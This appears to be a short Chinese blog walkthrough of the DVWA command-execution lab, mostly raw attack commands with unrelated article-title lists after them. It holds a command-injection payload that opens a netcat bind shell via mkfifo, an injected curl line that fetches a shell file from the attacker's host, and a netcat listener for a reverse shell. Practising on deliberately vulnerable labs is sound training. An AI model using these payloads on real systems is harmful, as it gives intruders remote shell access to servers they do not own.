DVWA-命令执行
2024-08-30 12:05:42
开门见山
·Low
·Medium
·High
· 命令执行监听端口
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
nc 192.168.31.100 4444
· 反弹shell
拷贝shell文件
启动kali的apache服务
修改shell文件
命令执行漏洞执行shell
;curl http://192.168.31.52/1.php
Kali打开侦听
nc -nvvlp 1234
执行命令后接收到监听
最新文章
- 【ORACLE】ORA-12537 问题整理
- js 模块开发之一(模块开发价值)
- 算法训练 区间k大数查询
- 转:Android 设置屏幕不待机
- COJ 1007 WZJ的数据结构(七) 树上操作
- Nvelocity模板引擎开发网页
- 原生js简单实现双向数据绑定原理
- 【java】package
- VS 星期作业 if else的应用 做一个受不受异性欢迎的小程序
- 【LeetCode】4. 寻找两个有序数组的中位数
- Hyper-v UBUNTU 12.04 模板设置
- 一个评测指标就是MAP(Mean Average Precision)平均精度均值。
- Java 学习札记(一)JDK安装配置
- NOI.AC NOIP模拟赛 第二场 补记
- 解决win7远程桌面连接时发生身份验证错误的方法
- mybatis查询参数为0时无法识别问题
- SQL Server 查询数据库表的列数
- Collections中的各种方法
- Python 实现小数和百分数的相互转换
- 题解【luogu P2421 bzoj P1407 [NOI2002]荒岛野人】
热门文章
- 官网英文版学习——RabbitMQ学习笔记(四)Work queues
- oracle开机启动
- 068-PHP定义并输出数组
- pycharm 配置 github 版本控制 VCS
- Docker 搭建开源跳板机_jumpserver (运维开源堡垒机_jumpserver) Centos_7.0
- 每天一点点之vue框架开发 - vue 动态替换路由(地址栏)参数
- EUI库 - 快速入口之项目配置
- RecyclerView+FloatingActionButton应用
- POJ 2251:Dungeon Master
- 滴滴与Uber都盯上拉美市场!一场惨烈竞争谁能胜出?